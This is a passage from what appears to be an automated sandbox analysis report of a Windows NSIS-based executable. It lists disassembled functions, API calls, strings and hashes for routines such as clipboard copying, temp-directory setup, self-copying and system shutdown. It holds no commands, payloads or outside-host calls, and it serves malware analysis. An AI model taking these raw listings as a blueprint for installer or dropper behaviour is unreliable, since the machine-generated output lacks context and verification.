4972->4984 4976 402708 4974->4976 4977 402387 GlobalFree 4974->4977 4977->4976 4978 401f06 4985 406035 lstrcpynW 4978->4985 4979 406831 18 API calls 4979->4981 4981->4976 4981->4979 4982 401f15 4987 406035 lstrcpynW 4982->4987 4984->4978 4985->4982 4986->4974 4987->4976

                                                                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                                                                    Function 004050F9 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 295windowclipboardmemoryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                    control_flow_graph 0 4050f9-405114 1 4052c1-4052c8 0->1 2 40511a-405201 GetDlgItem * 3 call 403dc4 call 4044a2 call 406831 call 4062cf GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052f2-4052ff 1->3 4 4052ca-4052ec GetDlgItem CreateThread CloseHandle 1->4 35 405203-40521d SendMessageW * 2 2->35 36 40521f-405222 2->36 6 405320-405327 3->6 7 405301-40530a 3->7 4->3 11 405329-40532f 6->11 12 40537e-405382 6->12 9 405342-40534b call 403df6 7->9 10 40530c-40531b ShowWindow * 2 call 403dc4 7->10 22 405350-405354 9->22 10->6 16 405331-40533d call 403d44 11->16 17 405357-405367 ShowWindow 11->17 12->9 14 405384-405387 12->14 14->9 20 405389-40539c SendMessageW 14->20 16->9 23 405377-405379 call 403d44 17->23 24 405369-405372 call 404f9e 17->24 29 4053a2-4053c3 CreatePopupMenu call 406831 AppendMenuW 20->29 30 4052ba-4052bc 20->30 23->12 24->23 37 4053c5-4053d6 GetWindowRect 29->37 38 4053d8-4053de 29->38 30->22 35->36 39 405232-405249 call 403d6b 36->39 40 405224-405230 SendMessageW 36->40 41 4053df-4053f7 TrackPopupMenu 37->41 38->41 46 40524b-40525f ShowWindow 39->46 47 40527f-4052a0 GetDlgItem SendMessageW 39->47 40->39 41->30 43 4053fd-405414 41->43 45 405419-405434 SendMessageW 43->45 45->45 48 405436-405459 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 49 405261-40526c ShowWindow 46->49 50 40526e 46->50 47->30 51 4052a2-4052b8 SendMessageW * 2 47->51 52 40545b-405484 SendMessageW 48->52 54 405274-40527a call 403dc4 49->54 50->54 51->30 52->52 53 405486-4054a0 GlobalUnlock SetClipboardData CloseClipboard 52->53 53->30 54->47
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000403), ref: 0040515B
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 0040516A
                                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 004051C2
                                                                                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000015), ref: 004051CA
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(?,00000008), ref: 00405266
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 00405287
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003F8), ref: 00405179
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042777E,759223A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004052D7
                                                                                                                                                                                                                                                                                                    • CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNELBASE(00000000), ref: 004052EC
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00405313
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(?,00000008), ref: 00405318
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000008), ref: 0040535F
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                                                                                                                                                                                                                                                                                    • CreatePopupMenu.USER32 ref: 004053A2
                                                                                                                                                                                                                                                                                                    • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 004053CA
                                                                                                                                                                                                                                                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                                                                                                                                                                                                                                                                                    • OpenClipboard.USER32(00000000), ref: 00405437
                                                                                                                                                                                                                                                                                                    • EmptyClipboard.USER32 ref: 0040543D
                                                                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                                                                                                                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00405453
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                                                                                                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                                                                                                                                                                                                                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                                                                                                                                                                                                                                                                                    • CloseClipboard.USER32 ref: 0040549A
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                                                                                                                                                                                                                    • String ID: New install of "%s" to "%s"${
                                                                                                                                                                                                                                                                                                    • API String ID: 2110491804-1641061399
                                                                                                                                                                                                                                                                                                    • Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                                                                                                                                                                                    • Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58
                                                                                                                                                                                                                                                                                                    Function 004038AF Relevance: 52.8, APIs: 22, Strings: 8, Instructions: 304filestringcomCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                    control_flow_graph 202 4038af-403945 #17 SetErrorMode OleInitialize call 406328 SHGetFileInfoW call 406035 GetCommandLineW call 406035 GetModuleHandleW 209 403947-40394a 202->209 210 40394f-403963 call 405d32 CharNextW 202->210 209->210 213 4039f6-4039fc 210->213 214 403a02 213->214 215 403968-40396e 213->215 216 403a21-403a39 GetTempPathW call 4037f8 214->216 217 403970-403976 215->217 218 403978-40397c 215->218 228 403a3b-403a59 GetWindowsDirectoryW lstrcatW call 4037f8 216->228 229 403a5f-403a79 DeleteFileW call 4035b3 216->229 217->217 217->218 219 403984-403988 218->219 220 40397e-403983 218->220 222 4039e4-4039f1 call 405d32 219->222 223 40398a-403991 219->223 220->219 222->213 237 4039f3 222->237 226 403993-40399a 223->226 227 4039a6-4039b8 call 40382c 223->227 232 4039a1 226->232 233 40399c-40399f 226->233 242 4039ba-4039c1 227->242 243 4039cd-4039e2 call 40382c 227->243 228->229 240 403af8-403b07 call 403885 CoUninitialize 228->240 229->240 241 403a7b-403a81 229->241 232->227 233->227 233->232 237->213 257 403bfa-403c00 240->257 258 403b0d-403b1d call 405ccc ExitProcess 240->258 244 403ae1-403ae8 call 405958 241->244 245 403a83-403a8c call 405d32 241->245 247 4039c3-4039c6 242->247 248 4039c8 242->248 243->222 254 403a04-403a1c call 40824c call 406035 243->254 256 403aed-403af3 call 406113 244->256 260 403aa5-403aa7 245->260 247->243 247->248 248->243 254->216 256->240 262 403c02-403c1f call 406328 * 3 257->262 263 403c7d-403c85 257->263 267 403aa9-403ab3 260->267 268 403a8e-403aa0 call 40382c 260->268 293 403c21-403c23 262->293 294 403c69-403c74 ExitWindowsEx 262->294 269 403c87 263->269 270 403c8b 263->270 275 403b23-403b3d lstrcatW lstrcmpiW 267->275 276 403ab5-403ac5 call 4067aa 267->276 268->267 283 403aa2 268->283 269->270 275->240 277 403b3f-403b55 CreateDirectoryW SetCurrentDirectoryW 275->277 276->240 286 403ac7-403add call 406035 * 2 276->286 281 403b62-403b82 call 406035 * 2 277->281 282 403b57-403b5d call 406035 277->282 303 403b87-403ba3 call 406831 DeleteFileW 281->303 282->281 283->260 286->244 293->294 297 403c25-403c27 293->297 294->263 300 403c76-403c78 call 40141d 294->300 297->294 301 403c29-403c3b GetCurrentProcess 297->301 300->263 301->294 308 403c3d-403c5f 301->308 309 403be4-403bec 303->309 310 403ba5-403bb5 CopyFileW 303->310 308->294 309->303 311 403bee-403bf5 call 406c94 309->311 310->309 312 403bb7-403bd7 call 406c94 call 406831 call 405c6b 310->312 311->240 312->309 322 403bd9-403be0 CloseHandle 312->322 322->309
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • #17.COMCTL32 ref: 004038CE
                                                                                                                                                                                                                                                                                                    • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                                                                                                                                                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 004038E0
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                                                    • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                    • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                                                                                                                                                                                                                                                                    • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                                                                                                                                                                                                                                                                    • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                                                                                                                                                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                                                                                                                                                                                                                                                                    • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00403B1D
                                                                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                                                                                                                                                                                                                                                                    • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                                                                                                                                                                                                                                                                    • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                                                                                                                                                                                                                                                                    • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                                                                                                                                                                                                    • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                                                                                                                                                                                                                                    • API String ID: 2435955865-3712954417
                                                                                                                                                                                                                                                                                                    • Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                                                                                                                                                    • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE
                                                                                                                                                                                                                                                                                                    Function 00406301 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                    control_flow_graph 790 406301-406315 FindFirstFileW 791 406322 790->791 792 406317-406320 FindClose 790->792 793 406324-406325 791->793 792->793
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                                                                    • String ID: jF
                                                                                                                                                                                                                                                                                                    • API String ID: 2295610775-3349280890
                                                                                                                                                                                                                                                                                                    • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                                                                                                                                                    • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED
                                                                                                                                                                                                                                                                                                    Function 00406328 Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                    control_flow_graph 794 406328-40633e GetModuleHandleA 795 406340-406349 LoadLibraryA 794->795 796 40634b-406353 GetProcAddress 794->796 795->796 797 406359-40635b 795->797 796->797
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                                    • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 310444273-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                                                                                                                                                    • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC
                                                                                                                                                                                                                                                                                                    Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351sleepfilewindowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                    control_flow_graph 56 4015a0-4015f4 57 4030e3-4030ec 56->57 58 4015fa 56->58 86 4030ee-4030f2 57->86 60 401601-401611 call 4062cf 58->60 61 401742-40174f 58->61 62 401962-40197d call 40145c GetFullPathNameW 58->62 63 4019ca-4019e6 call 40145c SearchPathW 58->63 64 40176e-401794 call 40145c call 4062cf SetFileAttributesW 58->64 65 401650-40166d call 40137e call 4062cf call 40139d 58->65 66 4017b1-4017d8 call 40145c call 4062cf call 405d85 58->66 67 401672-401686 call 40145c call 4062cf 58->67 68 401693-4016ac call 401446 call 4062cf 58->68 69 401715-401731 58->69 70 401616-40162d call 40145c call 4062cf call 404f9e 58->70 71 4016d6-4016db 58->71 72 401736-40173d 58->72 73 401897-4018a7 call 40145c call 406301 58->73 74 4018db-401910 call 40145c * 3 call 4062cf MoveFileW 58->74 75 40163c-401645 58->75 76 4016bd-4016d1 call 4062cf SetForegroundWindow 58->76 60->86 77 401751-401755 ShowWindow 61->77 78 401758-40175f 61->78 117 4019a3-4019a8 62->117 118 40197f-401984 62->118 63->57 123 4019ec-4019f8 63->123 64->57 136 40179a-4017a6 call 4062cf 64->136 65->86 160 401864-40186c 66->160 161 4017de-4017fc call 405d32 CreateDirectoryW 66->161 137 401689-40168e call 404f9e 67->137 142 4016b1-4016b8 Sleep 68->142 143 4016ae-4016b0 68->143 69->86 94 401632-401637 70->94 92 401702-401710 71->92 93 4016dd-4016fd call 401446 71->93 96 4030dd-4030de 72->96 138 4018c2-4018d6 call 4062cf 73->138 139 4018a9-4018bd call 4062cf 73->139 172 401912-401919 74->172 173 40191e-401921 74->173 75->94 95 401647-40164e PostQuitMessage 75->95 76->57 77->78 78->57 99 401765-401769 ShowWindow 78->99 92->57 93->57 94->86 95->94 96->57 113 4030de call 405f7d 96->113 99->57 113->57 130 4019af-4019b2 117->130 129 401986-401989 118->129 118->130 123->57 123->96 129->130 140 40198b-401993 call 406301 129->140 130->57 144 4019b8-4019c5 GetShortPathNameW 130->144 155 4017ab-4017ac 136->155 137->57 138->86 139->86 140->117 165 401995-4019a1 call 406035 140->165 142->57 143->142 144->57 155->57 163 401890-401892 160->163 164 40186e-40188b call 404f9e call 406035 SetCurrentDirectoryW 160->164 176 401846-40184e call 4062cf 161->176 177 4017fe-401809 GetLastError 161->177 163->137 164->57 165->130 172->137 178 401923-40192b call 406301 173->178 179 40194a-401950 173->179 192 401853-401854 176->192 182 401827-401832 GetFileAttributesW 177->182 183 40180b-401825 GetLastError call 4062cf 177->183 178->179 193 40192d-401948 call 406c94 call 404f9e 178->193 181 401957-40195d call 4062cf 179->181 181->155 190 401834-401844 call 4062cf 182->190 191 401855-40185e 182->191 183->191 190->192 191->160 191->161 192->191 193->181
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                                                                                                                                                                                                                    • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                                                                                                                                                                                                                    • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(?), ref: 00401753
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(?), ref: 00401767
                                                                                                                                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                                                                                                                                                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                                                                                                                                                                                                                    • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                                                                                                                                                                                                                    • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                                                                                                                                                                                                                    • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                                                                                                                                                                                                                    • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    • Rename failed: %s, xrefs: 0040194B
                                                                                                                                                                                                                                                                                                    • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                                                                                                                                                                                                                    • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                                                                                                                                                                                                                    • Jump: %d, xrefs: 00401602
                                                                                                                                                                                                                                                                                                    • Call: %d, xrefs: 0040165A
                                                                                                                                                                                                                                                                                                    • CreateDirectory: "%s" (%d), xrefs: 004017BF
